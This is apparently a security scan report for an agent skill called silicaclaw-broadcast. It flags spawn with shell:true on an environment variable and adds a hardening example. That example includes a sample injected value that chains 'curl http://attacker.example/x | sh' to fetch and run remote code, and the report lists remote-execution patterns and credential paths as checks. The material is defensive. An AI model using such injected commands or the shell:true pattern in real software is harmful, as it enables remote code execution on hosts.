Trusted: risk score 5/100
Last scanned: 2 days ago
silicaclaw-broadcast
Official OpenClaw skill for a bounded local SilicaClaw broadcast workflow: read public broadcasts, publish public broadcasts, and optionally forward owner-relevant summaries through OpenClaw's native channel.
SilicaClaw Broadcast is a legitimate local-bridge workflow skill with well-documented capabilities, no undeclared behavior, and no malicious indicators.
Skill name: silicaclaw-broadcast
Analysis time: 38.0s
Engine: pi
Verdict: safe to install
This skill is safe to use. Before deploying, set the OPENCLAW_OWNER_FORWARD_CMD environment variable to a fixed, trusted command: the forwarder hands that value to a shell, so whoever can set the variable decides what gets executed.

Security findings: 1

Severity | Finding | Location
Low | Subprocess execution with shell:true | scripts/owner-forwarder-demo.mjs:50
owner-forwarder-demo.mjs uses child_process.spawn with shell:true to execute OPENCLAW_OWNER_FORWARD_CMD. This is the documented forwarding mechanism, but because the value is passed to the system shell as a single command line, anyone who can set or modify that environment variable can run arbitrary commands (including chained commands via shell metacharacters) in the skill's context. The child also inherits the full process environment (env: process.env).
const child = spawn(OWNER_FORWARD_CMD, { shell: true, stdio: ['pipe', 'inherit', 'inherit'], env: process.env });
→ Documented and intentional. In production, set OPENCLAW_OWNER_FORWARD_CMD to a fixed, trusted command (preferably an absolute path) from operator-controlled configuration, never from user-controlled input, and treat the ability to set that variable as equivalent to command execution on the host.
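To show what the finding means in practice, here is the quoted spawn shape next to a hardened variant. This is an added example written for this report, not code from the silicaclaw-broadcast skill or from OpenClaw. It assumes (not stated on the page) that the forwarder reads one JSON payload on stdin, that OPENCLAW_OWNER_FORWARD_CMD is an executable plus whitespace-separated arguments with no quoting, and that only OPENCLAW_* variables plus PATH and HOME need to reach the child; the sample command values and the `["node"]` allowlist are constructed for the demo.

```javascript
// Added example, not the skill's own code: launching the forwarder without shell:true.
// Assumptions (not from the page): the forwarder reads one JSON payload on stdin, and
// OPENCLAW_OWNER_FORWARD_CMD is an executable plus whitespace-separated arguments.

// Characters that change what runs once a string reaches /bin/sh -c.
const SHELL_META = /[;&|<>$`\\"'(){}\n\r]/;

// Vulnerable form, same shape as the line the scanner quoted: the whole string is a
// shell command line, so "node a.mjs; curl ... | sh" runs both parts, and the child
// inherits every variable in process.env.
function buildForwardSpawnUnsafe(rawCmd) {
  return {
    file: rawCmd,
    args: [],
    options: { shell: true, stdio: ["pipe", "inherit", "inherit"], env: process.env },
  };
}

// Hardened parse: refuse empty values and shell metacharacters, split into argv, and
// optionally pin the executable basename to an allowlist.
function parseForwardCommand(rawCmd, allowedExecutables = null) {
  if (typeof rawCmd !== "string" || rawCmd.trim() === "") {
    throw new Error("OPENCLAW_OWNER_FORWARD_CMD is unset or empty; refusing to forward");
  }
  if (SHELL_META.test(rawCmd)) {
    throw new Error("OPENCLAW_OWNER_FORWARD_CMD contains shell metacharacters; refusing to forward");
  }
  const [file, ...args] = rawCmd.trim().split(/\s+/);
  if (allowedExecutables) {
    const base = file.split(/[\\/]/).pop();
    if (!allowedExecutables.includes(base)) {
      throw new Error(`executable "${base}" is not in the forwarder allowlist`);
    }
  }
  return { file, args };
}

// Forward only the variables the adapter needs (hypothetical allowlist: the skill's
// own OPENCLAW_* settings plus PATH and HOME) instead of the whole environment.
function pickEnv(env, prefixes = ["OPENCLAW_"], passthrough = ["PATH", "HOME"]) {
  const out = {};
  for (const [k, v] of Object.entries(env)) {
    if (passthrough.includes(k) || prefixes.some((p) => k.startsWith(p))) out[k] = v;
  }
  return out;
}

// Hardened form: argv array, shell:false, trimmed environment.
function buildForwardSpawn(rawCmd, env = process.env, allowedExecutables = null) {
  const { file, args } = parseForwardCommand(rawCmd, allowedExecutables);
  return {
    file,
    args,
    options: { shell: false, stdio: ["pipe", "inherit", "inherit"], env: pickEnv(env) },
  };
}

// Run the forwarder synchronously, writing the payload to its stdin. Loads
// child_process under both CommonJS and ESM (getBuiltinModule needs Node >= 20.16).
function runForwarder(rawCmd, payload, allowedExecutables = null) {
  const cp = typeof require === "function"
    ? require("node:child_process")
    : process.getBuiltinModule("node:child_process");
  const { file, args, options } = buildForwardSpawn(rawCmd, process.env, allowedExecutables);
  const result = cp.spawnSync(file, args, { ...options, input: JSON.stringify(payload) + "\n" });
  if (result.error) throw result.error;
  return result.status;
}

// Constructed sample values (not from the skill's docs); the script name matches the
// file in the skill's scripts/ directory.
const SAMPLE_CMD = "node scripts/owner-dispatch-adapter-demo.mjs";
const HOSTILE_CMD = "node scripts/owner-dispatch-adapter-demo.mjs; curl http://attacker.example/x | sh";

console.log("unsafe spawn would run:", buildForwardSpawnUnsafe(HOSTILE_CMD).file);
try {
  buildForwardSpawn(HOSTILE_CMD, process.env, ["node"]);
} catch (e) {
  console.log("hardened spawn rejected it:", e.message);
}
console.log("hardened spawn spec:", buildForwardSpawn(
  SAMPLE_CMD,
  { OPENCLAW_SOURCE_DIR: "/srv/skill", AWS_SECRET_ACCESS_KEY: "redacted", PATH: "/usr/bin" },
  ["node"],
));
if (process.env.OPENCLAW_OWNER_FORWARD_CMD) {
  const status = runForwarder(process.env.OPENCLAW_OWNER_FORWARD_CMD, { kind: "owner_summary", text: "demo" }, ["node"]);
  console.log("forwarder exit status:", status);
}
```

Splitting on whitespace deliberately drops shell quoting support: an operator who needs arguments with spaces should wrap the adapter in a small script and point the variable at that, rather than reintroducing a shell. The environment filter is the second half of the caveat: with `env: process.env` the forwarder receives every secret in the agent's environment, whereas the allowlisted copy passes only what the adapter is documented to read.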
Resource | Declared | Inferred | Status | Evidence
Network access | READ | READ | ✓ consistent | SKILL.md line 4: 'connect to a local SilicaClaw node at http://localhost:4310'; …
Command execution | WRITE | WRITE | ✓ consistent | SKILL.md line 145: 'OPENCLAW_OWNER_FORWARD_CMD=node scripts/owner-dispatch-adapt…
Environment variables | READ | READ | ✓ consistent | SKILL.md: OPENCLAW_OWNER_FORWARD_CMD, OPENCLAW_SOURCE_DIR, OPENCLAW_OWNER_CHANNE…
Filesystem | NONE | NONE | | No filesystem access in any script. bridge-client.mjs reads only command-line ar…
Clipboard | NONE | NONE | | No clipboard access observed.
Skill invocation | WRITE | WRITE | ✓ consistent | manifest.json: forward_to_owner_via_openclaw, owner_forwarding_policy, owner_dis…
Browser | NONE | NONE | | No browser access observed.
Database | NONE | NONE | | No database access observed.

Directory structure

11 files · 26.4 KB · 782 lines
Markdown 5 files · 490 lines; JavaScript 4 files · 251 lines; JSON 1 file · 35 lines; YAML 1 file · 6 lines
├─ 📁 agents
│ └─ 📋 openai.yaml YAML 6L · 742 B
├─ 📁 references
│ ├─ 📝 computer-control-via-openclaw.md Markdown 41L · 1.6 KB
│ ├─ 📝 owner-dialogue-cheatsheet-zh.md Markdown 81L · 2.0 KB
│ ├─ 📝 owner-dispatch-adapter.md Markdown 81L · 2.3 KB
│ └─ 📝 owner-forwarding-policy.md Markdown 48L · 1.9 KB
├─ 📁 scripts
│ ├─ 📜 bridge-client.mjs JavaScript 59L · 1.7 KB
│ ├─ 📜 owner-dispatch-adapter-demo.mjs JavaScript 12L · 255 B
│ ├─ 📜 owner-forwarder-demo.mjs JavaScript 111L · 3.5 KB
│ └─ 📜 send-to-owner-via-openclaw.mjs JavaScript 69L · 1.6 KB
├─ 📋 manifest.json JSON 35L · 1.4 KB
└─ 📝 SKILL.md Markdown 239L · 9.5 KB

Security highlights

✓ All network activity is restricted to localhost:4310 (the local SilicaClaw bridge)
✓ No credential harvesting or environment variable iteration for sensitive keys
✓ No base64 encoding, eval(), or dynamic code execution
✓ No access to sensitive paths (~/.ssh, ~/.aws, .env, etc.)
✓ No remote script execution (curl|bash, wget|sh)
✓ No hidden functionality—all shell execution is declared in SKILL.md and gated by explicit environment variables
✓ Strong safety boundaries documented: no arbitrary code execution from broadcast content, no wallet/private key access, no unknown remote endpoints
✓ Input validation on send command (requires --body flag)
✓ Message scoring logic is transparent and documented
✓ Well-structured payload forwarding with explicit schema